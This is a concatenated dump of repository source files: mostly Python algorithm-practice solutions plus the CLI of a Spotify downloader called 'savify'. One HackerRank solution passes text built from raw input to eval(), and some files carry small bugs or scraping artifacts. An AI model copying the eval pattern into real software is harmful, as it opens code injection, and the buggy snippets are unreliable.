j = currentNode[1] # get the row
if visited[i][j]: # if the node has been visited, continue
continue
visited[i][j] = True # mark the node as visited
if matrix[i][j] == 0:
continue
currentRiverSize += 1 # increment the river size # if the node is 1, add it to the queue
unvisitedNeighbors = getUnvisitedNeighbors(i, j, matrix, visited)
for neighbor in unvisitedNeighbors:
nodesToExplore.append(neighbor) # add the neighbor to the queue
if currentRiverSize > 0: # if the river size is greater than 0
sizes.append(currentRiverSize) # add the river size to the sizes array
def getUnvisitedNeighbors(i, j, matrix, visited):
unvisitedNeighbors = []
numRows = len(matrix)
numCols = len(matrix[i])
if i - 1 >= 0: # UP # check if the row is not on the border
unvisitedNeighbors.append((i - 1, j)) # push the neighbor into the neighbors list
if i + 1 < numRows: # DOWN # check if the row is not on the border
unvisitedNeighbors.append((i + 1, j))
if j - 1 >= 0: # LEFT # check if the col is not on the border
unvisitedNeighbors.append((i, j - 1)) #
if j + 1 < numCols: # RIGHT # check if the col is not on the border
unvisitedNeighbors.append((i, j + 1))
return unvisitedNeighbors
def main():
matrix = [
[1, 0, 0, 1, 0],
[1, 0, 1, 0, 0],
[0, 0, 1, 0, 1],
[1, 0, 1, 0, 1],
[1, 0, 1, 1, 0],
]
print(riverSizes(matrix)) # [1, 2, 2, 2, 5]
if __name__ == '__main__':
main()
```
#### File: 3.algorithmic_expert/Greedy Algorithm/3.tandem_bicycle.py
```python
"""
Explain the solution:
- The brute-force approach to solve this problem is to generate every possible set of pairs of riders and to determine the total speed that each of these sets generates. This solution does not work but, it isn't optimal. Can you think of better way to solve this problem?
- Try looking at the input arrays in sorted order. How might this help you solve the problem?
- When generating the maximum total speed, you want to pair the slowest red-shirt riders with the fastest blue-shirt riders and vice versa, so as to always take advantage of the largest speeds. When generating the minimum total speed, you want to pair the fastest red-shirt riders with the fastest blue-shirt riders, so as to "eliminate" a large speed by pairing it with a another large(larger) speed.
- Sort the input arrays in place, and follow the strategy discussed in Hint #3. With the inputs sorted, you can find the slowest and largest speeds from each shirt color in constant time.
- O(n(log(n)) time | O(1) space - where n is the length of the tandem bicycles
##################
Detailed explanation of the Solution:
create a function of tandemBicycle(redShirtSpeeds, blueShirtSpeeds, fastest):
sort the redShirtSpeeds and blueShirtSpeeds arrays in place
if not fastest:
call the function reverseArrayInPlace(redShirtSpeeds)
totalSpeed is initialized to 0
for idx in range(len(redShirtSpeeds)):
rider1 = redShirtSpeeds[idx] # array in sorted ascending order
rider2 = blueShirtSpeeds[len(blueShirtSpeeds) - 1 - idx] # Reverse the blueShirtSpeeds array in descending order
totalSpeed += max(rider1, rider2)
return totalSpeed
create a function of reverseArrayInPlace(array):
start = 0
end = len(array) - 1
while start < end:
array[start], array[end] = array[end], array[start]
start += 1
end -= 1
"""
####################################
def tandemBicycle(redShirtSpeeds, blueShirtSpeeds, fastest):
redShirtSpeeds.sort()
blueShirtSpeeds.sort()
if not fastest:
reverseArrayInPlace(redShirtSpeeds)
totalSpeed = 0
for idx in range(len(redShirtSpeeds)):
rider1 = redShirtSpeeds[idx] # array in sorted ascending order
rider2 = blueShirtSpeeds[len(blueShirtSpeeds) - 1 - idx] # Reverse the blueShirtSpeeds array in descending order
totalSpeed += max(rider1, rider2)
return totalSpeed
def reverseArrayInPlace(array):
start = 0
end = len(array) - 1
while start < end:
array[start], array[end] = array[end], array[start]
start += 1
end -= 1
print(tandemBicycle([5, 5, 3, 9, 2], [3, 6, 7, 2, 1], True))
```
#### File: 3.algorithmic_expert/Heaps/1.min_heap_construction.py
```python
class MinHeap:
def __init__(self, array):
self.heap = self.buildHeap(array)
# O(n) time | O(1) space
def buildHeap(self, array):
firstParentIdx = (len(array) - 2) // 2
for currentIdx in reversed(range(firstParentIdx + 1)):
self.siftDown(currentIdx, len(array) - 1, array)
return array
# O(log(n) time, O(1) space)
def siftDown(self, currentIdx, endIdx, heap): # compare both childs
childOneIdx = currentIdx * 2 + 1 # formula
while childOneIdx <= endIdx: # if node doesn't have leaf or doesn't have anymore child
childTwoIdx = currentIdx * 2 + 2 if currentIdx * 2 + 2 <= endIdx else -1 # -1 is coz if childIdx doesn't have leaf
if childTwoIdx != -1 and heap[childTwoIdx] < heap[childOneIdx]:
idxToSwap = childTwoIdx
else:
idxToSwap = childOneIdx # if childOneIdx < childTwoIdx
if heap[idxToSwap] < heap[currentIdx]:
self.swap(currentIdx, idxToSwap, heap)
currentIdx = idxToSwap # siftDown
childOneIdx = currentIdx * 2 + 1 # recalculate
else:
return
def siftUp(self, currentIdx, heap):
parentIdx = (currentIdx - 1) // 2 #formula to check
while currentIdx > 0 and heap[currentIdx] < heap[parentIdx]:
self.swap(currentIdx, parentIdx, heap)
currentIdx = parentIdx
parentIdx = (currentIdx - 1) // 2
def peek(self):
return self.heap[0] # peeking root node
def remove(self):
self.swap(0, len(self.heap) - 1, self.heap)#swapping the two value
valueToRemove = self.heap.pop()
self.siftDown(0, len(self.heap) - 1, self.heap)
return valueToRemove # returning minimum value
def insert(self, value):
self.heap.append(value) # add the value
self.siftUp(len(self.heap) - 1, self.heap) # siftup = two values - current index & heap
def swap(self, i, j, heap):
heap[i], heap[j] = heap[j], heap[i]
```
#### File: 3.algorithmic_expert/Strings/001.a.palindrome_check.py
```python
class MyClass:
def __init__(self, string:str):
self.string = string
# O(n^2) time | O(n) space
def isPalindrome_bruteforce(self):
self.string = self.string.lower()
# self.string = self.string.replace(" ", "")
# use isalnum() to check if the string contains only alphanumeric characters
self.string = ''.join(e for e in self.string if e.isalnum())
reversedString = []
for i in reversed(range(len(self.string))):
reversedString.append(self.string[i]) # adding directly to newString -> imporving
return self.string == "".join(reversedString)
# O(n) time and O(n) space
def isPalindrome_quickSol(self):
self.string = self.string.lower()
# self.string = self.string.replace(" ", "")
# use isalnum() to check if the string contains only alphanumeric characters
self.string = ''.join(e for e in self.string if e.isalnum())
return self.string == self.string[::-1]
# recursion
# O(n) time | O(n) space
def isPalindrome_recursion(self, i = 0):
j = len(self.string) - 1 - i
return True if i >= j else self.string[i] == self.string[j] and self.isPalindrome_recursion(i + 1)
# string[i] = firstIdx
# stringp[j] = lastIdx
# recursion always involve extra memory because of tail recursion
# tail recursion -
# O(n) time and O(1) space
def isPalindromeOptimized(self):
self.string = self.string.lower()
# self.string = self.string.replace(" ", "")
# use isalnum() to check if the string contains only alphanumeric characters
self.string = ''.join(e for e in self.string if e.isalnum())
leftIdx = 0 # pointer on firstIdx
rightIdx = len(self.string) - 1 # # pointer on lastIdx
while leftIdx < rightIdx:
if self.string[leftIdx] != self.string[rightIdx]:
return False
leftIdx += 1
rightIdx -= 1
return True
def main():
stringName = MyClass("abcdcbA ##$@$ ^##^$")
print(stringName.isPalindrome_bruteforce())
print(stringName.isPalindrome_quickSol())
print(stringName.isPalindrome_recursion())
print(stringName.isPalindromeOptimized())
if __name__ == '__main__':
main()
```
#### File: 3.algorithmic_expert/Strings/003.a.run_length_encoding.py
```python
def runLengthEncoding(string):
encodedStringCharacters = [] # lossless data compression
currentRunLength = 1 # this will always be 1(never be zero)
for i in range(1, len(string)):
currentCharacter = string[i]
previousCharacter = string[i - 1]
if currentCharacter != previousCharacter or currentRunLength == 9: # or is req so it can append individually
encodedStringCharacters.append(str(currentRunLength))
encodedStringCharacters.append(previousCharacter)
currentRunLength = 0 # needed so it can add like 9A4A vs 13A(not required)
currentRunLength += 1
encodedStringCharacters.append(str(currentRunLength))
encodedStringCharacters.append(string[len(string) - 1])
return "".join(encodedStringCharacters)
def main():
print(runLengthEncoding("AAAABBBCCDAA")) # 4A3B2C1D2A
if __name__ == "__main__":
main()
```
#### File: 3.algorithmic_expert/Strings/005.longest_palindrome_substring.py
```python
string = "abaxyzzyxf"
# O(n^2) time | O(n) space
def longestPalindromicSubstring(string):
currentLongest = [0, 1]
for i in range(1, len(string)): # starting from 1, as index[0] is already a palindrome
odd = getLongestPalindromeFrom(string, i - 1, i + 1) # i-1 = leftIdx & i + 1 = rightIdx
even = getLongestPalindromeFrom(string, i - 1, i)
longest = max(odd, even, key=lambda x: x[1] - x[0])
currentLongest = max(longest, currentLongest, key=lambda x: x[1] - x[0])
return string[currentLongest[0] : currentLongest[1]]
def getLongestPalindromeFrom(string, leftIdx, rightIdx):
while leftIdx >= 0 and rightIdx < len(string):
if string[leftIdx] != string[rightIdx]:
break
leftIdx -= 1
rightIdx += 1
return [leftIdx + 1, rightIdx]
print(longestPalindromicSubstring(string))
# ====================================================================================================
# O(n^3) time | O(n) space
def longestPalindromicSubstring(string):
longest = ""
for i in range(len(string)): # from index 0
for j in range(i, len(string)): # idx[0-6], [1-6], [2-6], [3-6], [4-6], [5,6],[6]
substring = string[i : j + 1] # string at index[0, 0-1..., 0-9, 1, 1-2 ...]
if len(substring) > len(longest) and isPalindrome(substring): # len(substring)= 1-10, 1-9 ... > len(longest) and becomes palindrome
longest = substring
return longest
def isPalindrome(string):
leftIdx = 0
rightIdx = len(string) - 1
while leftIdx < rightIdx:
if string[leftIdx] != string[rightIdx]:
return False
leftIdx += 1
rightIdx -= 1
return True
```
#### File: 3.algorithmic_expert/Strings/007.group_anagrams.py
```python
words =["yo", "act", "flop", "tac", "foo", "cat", "oy", "olfp"]
def groupAnagrams(words):
if len(words) == 0:
return []
sortedWords = ["".join(sorted(w)) for w in words] # sorted in a list | oy, act, flop, act, foo, act, oy, flop
indices = [i for i in range(len(words))] # list of indices
indices.sort(key=lambda x: sortedWords[x]) # sorting the indices based on sortedWords (which was done alphabetically)
result = []
currentAnagramGroup = []
currentAnagram = sortedWords[indices[0]] # current running Anagram .. starting from index 0
for index in indices: # index - 1, 3, 5, 2, 7, 4, 0, 6
word = words[index] # word is sorted but not arranged | act, tac, cat, flop, olfp...
sortedWord = sortedWords[index] # word is sorted and arranged alphbetically | act, act, act, flop, flop, foo, oy, oy
if sortedWord == currentAnagram:
currentAnagramGroup.append(word)
continue
result.append(currentAnagramGroup) # act, tac, cat
currentAnagramGroup = [word] # flop, olfp
currentAnagram = sortedWord # oy, yo
result.append(currentAnagramGroup)
return result
# ===
# O(w * n * log(n) time) | O (wn) space - where w is the number of words and
# n is the length of the longest word
# words = ["yo", "act", "flop", "tac", "foo", "cat", "oy", "olfp"]
def groupAnagrams(words):
anagrams = {}
for word in words: # print(word) # yo, act, flop, tac, foo, cat, oy, olfp
sortedWord = "".join(sorted(word)) # sort indices # oy, act, flop, act, foo, act, oy, flop
if sortedWord in anagrams:
# print(sortedWord) # act, act, oy, flop # keys
# print(anagrams)
# {'oy': ['yo'], 'act': ['act'], 'flop': ['flop']}
# {'oy': ['yo'], 'act': ['act', 'tac'], 'flop': ['flop'], 'foo': ['foo']}
# {'oy': ['yo'], 'act': ['act', 'tac', 'cat'], 'flop': ['flop'], 'foo': ['foo']}
# {'oy': ['yo', 'oy'], 'act': ['act', 'tac', 'cat'], 'flop': ['flop'], 'foo': ['foo']}
# print(anagrams[sortedWord]) # ['act'], ['act', 'tac'], ['yo'], ['flop']
# value = key
anagrams[sortedWord].append(word) # if sorted word in anagram -> appending keys(word)
else:
anagrams[sortedWord] = [word] # if word is not found in anagram then adding word
# print(anagrams) #{'oy': ['yo', 'oy'], 'act': ['act', 'tac', 'cat'], 'flop': ['flop', 'olfp'], 'foo': ['foo']}
# print(list(anagrams.keys())) # ['oy', 'act', 'flop', 'foo']
# print(list(anagrams.values())) # [['yo', 'oy'], ['act', 'tac', 'cat'], ['flop', 'olfp'], ['foo']]
return list(anagrams.values())
```
#### File: 3.algorithmic_expert/Strings/008.valid_ip_addresses.py
```python
def validIPAddresses(string):
ipAddressesFound = []
for i in range(1, min(len(string), 4)): # from index 0 - 4
currentIPAddressParts = ["","","",""]
currentIPAddressParts[0] = string[:i] # before the first period
if not isValidPart(currentIPAddressParts[0]):
continue
for j in range(i + 1, i + min(len(string) - i, 4)): # i + 1 = for second period, placement of i at most in 3 positions past of i
currentIPAddressParts[1] = string[i : j] # start from index i where the first position started to j at placement
if not isValidPart(currentIPAddressParts[1]):
continue
for k in range(j + 1, j + min(len(string) - j, 4)): # j + 1 = for third period, placement of j at most in 3 positions past of j
currentIPAddressParts[2] = string[j:k] # 3rd section
currentIPAddressParts[3] = string[k:] # 4th section
if isValidPart(currentIPAddressParts[2]) and isValidPart(currentIPAddressParts[3]):
ipAddressesFound.append(".".join(currentIPAddressParts))
return ipAddressesFound
def isValidPart(string):
stringAsInt = int(string)
if stringAsInt > 255:
return False
return len(string) == len(str(stringAsInt)) # check for leading 0 # 00 converted to 0, 01 converted to 1
```
#### File: 3.algorithmic_expert/Tries/1.Suffix Trie Construction.py
```python
"""
Explain the solution:
- Building a suffix-trie-like data structure consists of essentially storing every suffix of a given string in a trie. To do so, iterate through the input string one character at a time, and insert every substring starting at each character and ending at the end of string into the trie.
- To insert a string into the trie, start by adding the first character of the string into the root node of the trie and map it to an empty hash table if it isin't already there. Then, iterate through the rest of the string, inserting each of the remaining characters into the previous character's corresponding node(or hash table) in the trie, making sure to add an endSymbol "*" at the end.
- Searching the trie for a specific string should follow a nearly identical logic to the one used to add a string in the trie.
# Creation: O(n^2) time | O(n^2) space - where n is the length of the input string
# Searching: O(m) time | O(1) space - where m is the length of the input string
##################
Detailed explanation of the Solution:
create a class called SuffixTrie:
initialize function takes in a string:
initialize the class with root as an empty hash table
initialize the class with a endSymbol variable that is set to "*"
create a method called populateSuffixTrieFrom with a parameter of string
# Creation:
initialize function populateSuffixTrieFrom takes in a string:
iterate as i through the string one character at a time:
use Helper function insertSubsStringStartingAt with the parameter of the string and the current character(i)
initialize function insertSubsStringStartingAt takes in a string and a character(i):
create a variable called node that is set to the root of the trie
iterate as j through the string starting at the character(i) and ending at the end of the string:
create a variable called letter that is set to the current string[j]
if the letter is not in the node:
create a new hash table and set it to the node[letter] # this is the first time we've seen this letter
create a variable called node that is set to the node[letter] # this is the node we're currently at
node[self.endSymbol] = True # insert the endSymbol "*" at the end of the string
# Searching:
initialize function contains takes in a string:
create a variable called node that is set to the root of the trie
iterate as letter through the string:
if the letter is not in the node:
return False
create a variable called node that is set to the node[letter]
return self.endSymbol in node # return True if the endSymbol "*" is in the node
"""
####################################
class SuffixTrie:
def __init__(self, string):
self.root = {}
self.endSymbol = "*"
self.populateSuffixTrieFrom(string) #call the populateSuffixTrieFrom function with the string as a parameter
# Creation
def populateSuffixTrieFrom(self, string):
for i in range(len(string)):
self.insertSubstringStartingAt(string, i) #insert the substring starting at each character and ending at the end of string into the trie
def insertSubstringStartingAt(self, string, i):
node = self.root
for j in range(i, len(string)):#iterate through the string starting at the index i
letter = string[j] #get the letter at the index j
if letter not in node:
node[letter] = {} #if the letter is not in the node, add it to the node and map it to an empty hash table
node = node[letter] # this is the node that we are currently at
node[self.endSymbol] = True
# Searching
def contains(self, string):
node = self.root #start at the root node
for letter in string:
if letter not in node: #if the current letter is not in the node, return false
return False
node = node[letter] #move to the next node
return self.endSymbol in node #return True if the endSymbol "*" is in the node
def main():
string = "babc"
trie = SuffixTrie(string)
print(trie.root)
if __name__ == '__main__':
main()
```
#### File: 4.hacker_rank/A.30 Days of Code/002_operators.py
```python
def solve(meal_cost, tip_percent, tax_percent):
tip = (meal_cost * tip_percent) / 100
tax = (meal_cost * tax_percent) / 100
totalCost = int(round(meal_cost + tip + tax))
print(totalCost)
if __name__ == '__main__':
meal_cost = 12.0
tip_percent = 20
tax_percent = 8
print(solve(meal_cost, tip_percent, tax_percent))
```
#### File: 4.hacker_rank/A.30 Days of Code/011_2D_array.py
```python
import os
# hourglass
# a b c
# d
# e f g
# Complete the hourglassSum function below.
def hourglassSum(arr):
sum = []
for i in range(len(arr)-2): #-2 because (from hour glass), if the pointer is at 'a' it can go to 'b' and then 'c' by adding 1 and then 1 again
# - 2 is basically done for indexing coz defined by hourglass
for j in range(len(arr)-2): # -2 because if the pointer is at 'a' it can go go 'e' 'f' 'g' by adding 1 and then 1 again
sum.append(
arr[i][j]
+arr[i][j+1]
+arr[i][j+2]
+arr[i+1][j+1]
+arr[i+2][j]
+arr[i+2][j+1]
+arr[i+2][j+2])
# print(max(sum)) # debug output
return(max(sum))
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
arr = []
for _ in range(6):
arr.append(list(map(int, input().rstrip().split())))
result = hourglassSum(arr)
fptr.write(str(result) + '\n')
fptr.close()
```
#### File: 4.hacker_rank/A.30 Days of Code/012_inheritance.py
```python
Days of Code/012_inheritance.py<gh_stars>1-10
# Grading Scale
# O | 90 <= a <= 100
# E | 80 <= a < 90
# A | 70 <= a < 80
# P | 55 <= a < 70
# D | 40 <= a < 55
# T | a < 40
class Person:
def __init__(self, firstName, lastName, idNumber):
self.firstName = firstName
self.lastName = lastName
self.idNumber = idNumber
def printPerson(self):
print("Name:", self.lastName + ",", self.firstName)
print("ID:", self.idNumber)
class Student(Person):
# Class Constructor
def __init__(self, firstName, lastName, idNumber, scores):
Person.__init__(self, firstName, lastName, idNumber)
self.scores = scores
# Write your function here
def calculate(self):
sum = 0
for score in scores:
sum += score
average = sum/len(scores)
if average < 40:
return 'T'
elif average < 55:
return 'D'
elif average < 70:
return 'P'
elif average < 80:
return 'A'
elif average < 90:
return 'E'
else:
return 'O'
```
#### File: C.Algorithms/001_Warm_up/005_diagonal_difference.py
```python
import math
import os
import random
import re
import sys
def diagonalDifference(arr):
l, r = 0, 0
for i in (range(len(arr))):
l += arr[i][i]
r += arr[i][-i-1]
return abs(l-r)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input().strip())
arr = []
for _ in range(n):
arr.append(list(map(int, input().rstrip().split())))
result = diagonalDifference(arr)
fptr.write(str(result) + '\n')
fptr.close()
```
#### File: D.Practice/002_Basic Data Types/005_lists.py
```python
#Sample Output 0
#[6, 5, 10]
#[1, 5, 9 , 10]
#[9, 5, 1]
def handler(result):
inp = input().split()
command = inp[0]
values = inp[1:]
if command == 'print':
print(result)
else:
execute = 'result.' + command + "(" + ",".join(values) + ")"
eval(execute)
result = []
for i in range(int(input())):
handler(result)
```
#### File: 7.LC_Pattern/Array/maximum_subarray.py
```python
import unittest
from typing import List
class Solution:
# O(n) time, O(1) space
def maxSubArray(self, nums) -> int:
max_sum, current_sum = -float('inf'), 0
for num in nums:
current_sum = max(num, current_sum + num) # if current_sum + num < 0, then current_sum = 0
max_sum = max(current_sum, max_sum) # if current_sum > max_sum, then current_sum is the new max_sum
return max_sum
# divide and conquer
# O(nlogn) time, O(1) space
def maxSubArray_divide_conquer(self, nums) -> int:
if len(nums) == 1:
return nums[0]
# if len(nums) == 0, return 0
if len(nums) == 0:
return 0
# divide
mid = len(nums) // 2
left_sum = self.maxSubArray_divide_conquer(nums[:mid])
right_sum = self.maxSubArray_divide_conquer(nums[mid:])
# conquer
left_sum_max = nums[mid - 1] # nums[mid - 1] is the last element of left subarray
left_sum_current = 0
for i in range(mid - 1, -1, -1): # from mid - 1 to 0
left_sum_current += nums[i] # sum up all the elements in left subarray
left_sum_max = max(left_sum_max, left_sum_current) # if left_sum_current > left_sum_max, then left_sum_current is the new left_sum_max
right_sum_max = nums[mid] # nums[mid] is the first element of right subarray
right_sum_current = 0
for i in range(mid, len(nums)): # from mid to len(nums) - 1
right_sum_current += nums[i] # sum up all the elements in right subarray
right_sum_max = max(right_sum_max, right_sum_current) # if right_sum_current > right_sum_max, then right_sum_current is the new right_sum_max
return max(left_sum, right_sum, left_sum_max + right_sum_max)
# dynamic programming
# O(n) time, O(1) space
def maxSubArray_dynamic_programming(self, nums: List[int]) -> int:
best = nums[0]
current = nums[0]
for i in nums[1:]:
current = max(i, current + i)
if current > best:
best = current
return best
class Test(unittest.TestCase):
def test(self):
test = Solution()
nums = [-2,1,-3,4,-1,2,1,-5,4]
self.assertEqual(test.maxSubArray(nums), 6)
def test_divide_conquer(self):
test = Solution()
nums = [-2,1,-3,4,-1,2,1,-5,4]
self.assertEqual(test.maxSubArray_divide_conquer(nums), 6)
def test_dynamic_programming(self):
test = Solution()
nums = [-2,1,-3,4,-1,2,1,-5,4]
self.assertEqual(test.maxSubArray_dynamic_programming(nums), 6)
def main():
unittest.main()
if __name__ == "__main__":
main()
``` |
{
"source": "jimmymasaru/savify",
"score": 2
} |
#### File: savify/savify/cli.py
```python
import sys
import re
import click
import logging
from os import system
from pathlib import Path
from . import __version__, __author__
from .types import *
from .utils import PathHolder, create_dir
from .savify import Savify
from .logger import Logger
from .exceptions import FFmpegNotInstalledError, SpotifyApiCredentialsNotSetError, UrlNotSupportedError, \
InternetConnectionError
BANNER = rf"""
/$$$$$$$$$$$$$ /$$$$$$ /$$ /$$$$$$
| $$$$$$$$$$$$$ /$$__ $$ |__/ /$$__ $$
| $$$$$$$$$$$$$ | $$ \__/ /$$$$$$ /$$ /$$ /$$| $$ \__//$$ /$$
| $$$$$$$$$$$$$ | $$$$$$ |____ $$| $$ /$$/| $$| $$$$ | $$ | $$
| $$$$$$$$$$$$$ \____ $$ /$$$$$$$ \ $$/$$/ | $$| $$_/ | $$ | $$
/$$$$$$$$$$$$$$$$$$ /$$ \ $$ /$$__ $$ \ $$$/ | $$| $$ | $$ | $$
\ $$$$$$$$$$$$$$$$/ | $$$$$$/| $$$$$$$ \ $/ | $$| $$ | $$$$$$$
\ $$$$$$$$$$$$/ \______/ \_______/ \_/ |__/|__/ \____ $$
\ $$$$$$$$/ /$$ | $$
\ $$$$/ https://github.com/LaurenceRawlings/savify | $$$$$$/
\_/ \______/ v{__version__}
"""
system('title Savify')
class Choices:
BOOL = ['true', 'false']
PATH = '<SYSTEM PATH>'
TYPE = ['track', 'album', 'playlist', 'artist']
QUALITY = ['best', '320k', '256k', '192k', '128k', '96k', '32k', 'worst']
FORMAT = ['mp3', 'aac', 'flac', 'm4a', 'opus', 'vorbis', 'wav']
GROUPING = "%artist%, %album%, %playlist% separated by /"
def choices(choice) -> str:
return ', '.join(choice)
def get_choice() -> str:
return input('[INPUT]\tEnter choice: ').lower()
def show_banner() -> None:
click.clear()
click.echo(BANNER)
def validate_group(_ctx, _param, value):
regex = r"^((%artist%|%album%|%playlist%)(\/(%artist%|%album%|%playlist%))*)+$"
if re.search(regex, str(value)) or value is None:
return value
else:
raise click.BadParameter('Group must be in the form x or x/x/x... where x in [%artist%, %album%, %playlist%]')
def guided_cli(type, quality, format, output, group, path, m3u, artist_albums, skip_cover_art):
choice = ''
options = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
errors = []
while not choice or choice.lower() in options:
show_banner()
print(' Options\tChoices\t\t\t\t\t\tSelected\n--------------------------------------------------------'
'----------------')
print(f'[1] Type\t{choices(Choices.TYPE)}\t\t\t{type}\n'
f'[2] Quality\t{choices(Choices.QUALITY)}\t{quality}\n'
f'[3] Format\t{choices(Choices.FORMAT)}\t\t{format}\n'
f'[4] Output\t{Choices.PATH}\t\t\t\t\t{output}\n'
f'[5] Grouping\t{Choices.GROUPING}\t{group}\n'
f'[6] Temp\t{Choices.PATH}\t\t\t\t\t{path}\n'
f'[7] Create M3U\t{choices(Choices.BOOL)}\t\t\t\t\t{m3u}\n'
f'[8] Cover-art\t{choices(Choices.BOOL)}\t\t\t\t\t{not skip_cover_art}\n'
f'[9] All Albums\t{choices(Choices.BOOL)}\t\t\t\t\t{artist_albums}\n'
f'\n[0] Exit\n')
for error in errors:
print(f'[ERROR]\t{error}')
errors = []
choice = input('[INPUT]\tEnter an option or a search query: ')
# TODO: This is horrendous
if choice == '0':
sys.exit(0)
elif choice == '1':
type_input = get_choice()
if type_input in Choices.TYPE:
type = convert_type(type_input)
else:
errors.append('Invalid choice')
elif choice == '2':
quality_input = get_choice()
if quality_input in Choices.QUALITY:
quality = convert_quality(quality_input)
else:
errors.append('Invalid choice')
elif choice == '3':
format_input = get_choice()
if format_input in Choices.FORMAT:
format = convert_format(format_input)
else:
errors.append('Invalid choice')
elif choice == '4':
output_input = get_choice()
try:
create_dir(Path(output_input))
output = output_input
except:
errors.append('Invalid path')
elif choice == '5':
group_input = get_choice()
if validate_group(None, None, group_input):
group = group_input
else:
errors.append('Invalid group syntax')
elif choice == '6':
path_input = get_choice()
try:
create_dir(Path(path_input))
path = path_input
except:
errors.append('Invalid path')
elif choice == '7':
m3u_input = get_choice()
if m3u_input in Choices.BOOL:
m3u = convert_bool(m3u_input)
else:
errors.append('Invalid choice')
elif choice == '8':
skip_cover_art_input = get_choice()
if skip_cover_art_input in Choices.BOOL:
skip_cover_art = not convert_bool(skip_cover_art_input)
else:
errors.append('Invalid choice')
elif choice == '9':
artist_albums_input = get_choice()
if artist_albums_input in Choices.BOOL:
artist_albums = convert_bool(artist_albums_input)
else:
errors.append('Invalid choice')
query = choice
show_banner()
return type, quality, format, output, group, path, m3u, query, artist_albums, skip_cover_art
@click.command(name='Savify', context_settings=dict(allow_extra_args=True, ignore_unknown_options=True))
@click.help_option()
@click.version_option(version=__version__)
@click.option('-t', '--type', default=Choices.TYPE[0], help='Query type for text search.',
type=click.Choice(Choices.TYPE))
@click.option('-q', '--quality', default=Choices.QUALITY[0], help='Bitrate for downloaded song(s).',
type=click.Choice(Choices.QUALITY))
@click.option('-f', '--format', default=Choices.FORMAT[0], help='Format for downloaded song(s).',
type=click.Choice(Choices.FORMAT))
@click.option('-g', '--group', default=None, callback=validate_group, help=Choices.GROUPING, type=click.STRING)
@click.option('-o', '--output', default=None, help='Output directory for downloaded song(s).',
type=click.Path(exists=True, file_okay=False, dir_okay=True, writable=True, readable=True))
@click.option('-p', '--path', default=None, help='Path to directory to be used for data and temporary files.',
type=click.Path(exists=True, file_okay=False, dir_okay=True, writable=True, readable=True))
@click.option('-m', '--m3u', is_flag=True, help='Create an M3U playlist file for your download.')
@click.option('-a', '--artist-albums', is_flag=True, help='Download all artist songs and albums'
', not just top 10 songs.')
@click.option('-l', '--language', default=None, help='ISO-639 language code to be used for searching and tags applying.',
type=click.STRING)
@click.option('--skip-cover-art', is_flag=True, help='Don\'t add cover art to downloaded song(s).')
@click.option('--silent', is_flag=True, help='Hide all output to stdout, overrides verbosity level.')
@click.option('-v', '--verbose', count=True, help='Change the log verbosity level. [-v, -vv]')
@click.argument('query', required=False)
@click.pass_context
def main(ctx, type, quality, format, output, group, path, m3u, artist_albums, verbose, silent, query, skip_cover_art, language):
if not silent:
show_banner()
log_level = convert_log_level(verbose)
else:
log_level = None
guided = False
if not query:
guided = True
type, quality, format, output, group, path, m3u, query, artist_albums, skip_cover_art = \
guided_cli(type, quality, format, output, group, path, m3u, artist_albums, skip_cover_art)
path_holder = PathHolder(path, output)
output_format = convert_format(format)
query_type = convert_type(type)
quality = convert_quality(quality)
logger = Logger(path_holder.data_path, log_level)
ydl_options = {ctx.args[i][2:]: ctx.args[i+1] for i in range(0, len(ctx.args), 2)}
def setup(ffmpeg='ffmpeg'):
return Savify(quality=quality, download_format=output_format, path_holder=path_holder, group=group,
skip_cover_art=skip_cover_art, language=language, logger=logger, ffmpeg_location=ffmpeg,
ydl_options=ydl_options)
def check_guided():
if guided:
input('\n[INFO]\tPress enter to exit...')
try:
s = setup()
except FFmpegNotInstalledError as ex:
from .ffmpegdl import FFmpegDL
ffmpeg_dl = FFmpegDL(str(path_holder.data_path))
if not ffmpeg_dl.check_if_file():
logger.error(ex.message)
if silent:
check_guided()
return 1
choice = input('[INPUT]\tWould you like Savify to download FFmpeg for you? (Y/n) ')
if choice.lower() == 'y' or not choice:
logger.info('Downloading FFmpeg...')
try:
ffmpeg_location = ffmpeg_dl.download()
except:
logger.error('Failed to download FFmpeg!')
check_guided()
return 1
logger.info(f'FFmpeg downloaded! [{ffmpeg_location}]')
else:
check_guided()
return 1
else:
ffmpeg_location = ffmpeg_dl.final_location
s = setup(ffmpeg=str(ffmpeg_location))
except SpotifyApiCredentialsNotSetError as ex:
logger.error(ex.message)
check_guided()
return 1
try:
s.download(query, query_type=query_type, create_m3u=m3u, artist_albums=artist_albums)
except UrlNotSupportedError as ex:
logger.error(ex.message)
check_guided()
return 1
except InternetConnectionError as ex:
logger.error(ex.message)
check_guided()
return 1
check_guided()
return 0
def convert_type(query_type: str) -> Type:
mapping = {
'track': Type.TRACK,
'album': Type.ALBUM,
'playlist': Type.PLAYLIST,
"artist": Type.ARTIST,
}
return mapping[query_type.lower()]
def convert_quality(quality: str) -> Quality:
mapping = {
'best': Quality.BEST,
'320k': Quality.Q320K,
'256k': Quality.Q256K,
'192k': Quality.Q192K,
'128k': Quality.Q128K,
'98k': Quality.Q96K,
'32k': Quality.Q32K,
'worst': Quality.WORST,
}
return mapping[quality.lower()]
def convert_format(output_format: str) -> Format:
mapping = {
'mp3': Format.MP3,
'aac': Format.AAC,
'flac': Format.FLAC,
'm4a': Format.M4A,
'opus': Format.OPUS,
'vorbis': Format.VORBIS,
'wav': Format.WAV,
}
return mapping[output_format.lower()]
def convert_bool(boolean) -> bool:
return boolean.lower() == 'true'
def convert_log_level(verbosity: int) -> int:
if verbosity == 1:
return logging.WARNING
elif verbosity == 2:
return logging.DEBUG
else:
return logging.INFO
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
``` |
{
"source": "jimmymathews/MITI",
"score": 2
} |
#### File: mititools/serializers/frictionless.py
```python
import os
from os import mkdir
from os.path import join
from os.path import exists
import json
import importlib.resources
import jinja2
from jinja2 import Environment
from jinja2 import BaseLoader
with importlib.resources.path('mititools', 'fd_schema.json.jinja') as file:
jinja_environment = Environment(loader=BaseLoader)
fd_schema_file_contents = open(file, 'rt').read()
from ..default_values import fd_package_path
from ..name_manipulation import create_table_filename
from ..name_manipulation import create_auxiliary_table_filename
def write_frictionless(top_variables, data_tables):
json_str = render_json_data_package(top_variables)
json_object = json.loads(json_str)
payload = json.dumps(json_object, indent=2)
json_filename = 'datapackage.json'
if not exists(fd_package_path):
mkdir(fd_package_path)
